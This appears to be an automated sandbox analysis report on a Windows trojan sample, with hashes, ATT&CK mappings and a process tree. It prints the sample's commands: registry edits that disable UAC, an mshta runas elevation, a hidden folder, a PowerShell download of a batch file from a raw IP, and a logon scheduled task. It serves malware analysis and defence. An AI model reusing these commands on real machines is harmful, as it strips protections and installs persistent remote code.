2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2024 04:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	2000	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2000	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4708	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	203120~1.EXE

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4544	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2000	powershell.exe
2000	powershell.exe
888	msedge.exe
888	msedge.exe
3660	msedge.exe
3660	msedge.exe
2096	identity_helper.exe
2096	identity_helper.exe
3700	msedge.exe
3700	msedge.exe
3700	msedge.exe
3700	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2000	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe
3660	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 396 wrote to memory of 3708	396	2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe	81
PID 396 wrote to memory of 3708	396	2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe	81
PID 3708 wrote to memory of 4544	3708	cmd.exe	84
PID 3708 wrote to memory of 4544	3708	cmd.exe	84
PID 4544 wrote to memory of 4448	4544	mshta.exe	85
PID 4544 wrote to memory of 4448	4544	mshta.exe	85
PID 4544 wrote to memory of 4448	4544	mshta.exe	85
PID 4448 wrote to memory of 4488	4448	203120~1.EXE	86
PID 4448 wrote to memory of 4488	4448	203120~1.EXE	86
PID 4488 wrote to memory of 1816	4488	cmd.exe	88
PID 4488 wrote to memory of 1816	4488	cmd.exe	88
PID 4488 wrote to memory of 1592	4488	cmd.exe	89
PID 4488 wrote to memory of 1592	4488	cmd.exe	89
PID 4488 wrote to memory of 4880	4488	cmd.exe	90
PID 4488 wrote to memory of 4880	4488	cmd.exe	90
PID 4488 wrote to memory of 2856	4488	cmd.exe	91
PID 4488 wrote to memory of 2856	4488	cmd.exe	91
PID 2856 wrote to memory of 1928	2856	cmd.exe	92
PID 2856 wrote to memory of 1928	2856	cmd.exe	92
PID 4488 wrote to memory of 3660	4488	cmd.exe	93
PID 4488 wrote to memory of 3660	4488	cmd.exe	93
PID 4488 wrote to memory of 4708	4488	cmd.exe	94
PID 4488 wrote to memory of 4708	4488	cmd.exe	94
PID 3660 wrote to memory of 4276	3660	msedge.exe	95
PID 3660 wrote to memory of 4276	3660	msedge.exe	95
PID 4488 wrote to memory of 2000	4488	cmd.exe	96
PID 4488 wrote to memory of 2000	4488	cmd.exe	96
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97
PID 3660 wrote to memory of 920	3660	msedge.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4708	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe
"C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:396
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42C6.tmp\42C7.tmp\42C8.bat C:\Users\Admin\AppData\Local\Temp\2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\203120~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Users\Admin\AppData\Local\Temp\203120~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\203120~1.EXE" goto :target
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4448
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4621.tmp\4622.tmp\4623.bat C:\Users\Admin\AppData\Local\Temp\203120~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4488
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:1816
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:1592
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:4880
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2856
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:1928
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba55a46f8,0x7ffba55a4708,0x7ffba55a4718
        7⤵
        
        PID:4276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        7⤵
        
        PID:920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
        7⤵
        
        PID:644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
        7⤵
        
        PID:4360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        
        PID:1656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 /prefetch:8
        7⤵
        
        PID:2040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
        7⤵
        
        PID:3428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
        7⤵
        
        PID:1444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
        7⤵
        
        PID:3312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
        7⤵
        
        PID:3116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7169597998471098172,5987856645882367808,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5172 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3700
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eaa3db555ab5bc0cb364826204aad3f0

SHA1
a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

SHA256
ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

SHA512
e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4b4f91fa1b362ba5341ecb2836438dea

SHA1
9561f5aabed742404d455da735259a2c6781fa07

SHA256
d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

SHA512
fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
924c590c6d0cd719a78fae12468e7bcc

SHA1
1c31757b6bd835c3378b035cc72ae596df1b86b7

SHA256
9880757b87072b6b6adf0d02019067d3122a452e0c826bbbe7d34e7093c99686

SHA512
d52b1aba7eae7f9174b8a4154e8401326f8e60d1b7a3b4862b636a7beb5c1e52dfeb48a902cff7d6c86891a52b9f8745dabdd404358adc7051aef9be57e5818b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
ad693d4bc6924cffae6faf61c33f3e09

SHA1
5e607075afda01a6d2828fbbb7b954f242e24e27

SHA256
d702920aeafd6354a0f338221b5fb4c3ad46e264fefdc05da0a7e63d1a4fe78f

SHA512
5d3e213cf51012bd970fd136ed8a66fd3e9d0afe1ed6e199ee03985aaae60c275a50e398ede394b9602efc25145ae1404be72aeb20e2e0e753f3720d287b41f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0f1f37eab2f7758fb8e5df661d909011

SHA1
8955064bee5eab16551ee9c8d33e1ac0609b0172

SHA256
45a63ab5e6b3125718ffbaca3f82ad20f73f71abb97812ba09e2b6af21d871db

SHA512
c10757437f346c5e9f363959cafa049114d1024d45745c17e062ed6cd35015f9d6e34db42dcbac37cb76d6206447f1969dc188d985405baf5a2c11ffa8e194dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d865c4467eb6b0079482c44ed2f6e87e

SHA1
0c5f0f29db4aa407b8d3e19c91e52254ba190462

SHA256
8b540d1cb1b95ae9237f58d3a03adad12be8f3d3e8277bff54e0195e442e0ba0

SHA512
09213a4753625d084c44a44f86700d9bd0d14b11f71b153d96eb4518aa09d8289b330d844ad7c192316fe0b114247a51e82ab9bbe904a71887cab54c59685bb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
db17211a82105ca7b2c2ac400b268031

SHA1
e9dc49990f781d00b2da286e36c8deb48bc54500

SHA256
5bf537a2ed55e0f62aec1943f74e9ccfe7c6bc29e316e5d59563c134933d1439

SHA512
4d87e9fa4e4d9a1f24548030b57d3b66e350ae988f20edea0d8322415d43a24889ce06a59f06bfbc3669535cf1f0588e5fe123bdbf27b755faf605d13de8e714

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57a47d.TMP

Filesize
48B

MD5
5f7a2b62e507c6413f150b3804c37112

SHA1
cf9c7fd1e0b14b4210ed8f8a71ad6a08f3370017

SHA256
201afa857fe148214574e43792bc0637b06ac008b439bfef54b258149c078a1e

SHA512
42f5833c09e0ae48ed4294073e64cf6ec2353d458bf016d73021c01b7322bf680cabb06a3cf9458be85c7fdf599be7b18bca6858eb1c622a564c3b707b9012a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
314e5e3cc396b1dd126bad52f72a96c9

SHA1
af16b9178b0782627881d1ca9a05280571e3b355

SHA256
32eed5e597108b3b0d15a9bf7c024bdb85deaef0fa8aad8901551b4791f935a7

SHA512
e3897301dcd3ab671a7d7bfec9b8942eddd7f1dc73ce03c5959ae042e5a6ef7d83da19403b988133b3c9d6252502345f4a2b6a561cf37648bf2c6bd50d83cf24

Download Submit
C:\Users\Admin\AppData\Local\Temp\42C6.tmp\42C7.tmp\42C8.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vlk4hfxh.3jg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2000-17-0x000001C8EF4D0000-0x000001C8EF4F2000-memory.dmp

Filesize
136KB

Download